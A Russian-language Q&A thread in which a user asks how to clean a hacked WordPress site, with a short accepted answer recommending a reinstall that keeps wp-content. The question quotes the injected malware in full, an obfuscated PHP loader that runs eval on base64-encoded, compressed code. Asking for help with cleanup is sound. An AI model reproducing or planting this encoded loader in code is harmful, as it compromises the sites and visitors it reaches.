# Взломали сайт на Wordpress

Tags: wordpress, взлом

Мой сайт взломали. В каждой директории есть файлы типа `zsdknvfskd.php` или `asofcm.php`. Также в каждом файле php и файлах темы WordPress есть код такого типа:

```
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?><?php
```

В ручную удалять не вариант, так как их очень много. Как можно сохранить все данные и настройки сайта и заново переустановить WordPress. Или какие то альтернативные решения есть?

Comment: Рекомендую всегда использывать систему контроля версий, например Git, спасет от многих болей в одной точке.

Answer (score 1, accepted):

Переустановка - самый простой вариант:

- Копируем все файлы из папки `wp-content`
- Удаляем все файлы cms, устанавливаем `WP` заново
- Закидываем папку  `wp-content` (перед этим очистив ее от вредоносных файлов)

Если не поможет, то тут уже надо обращаться к специалистам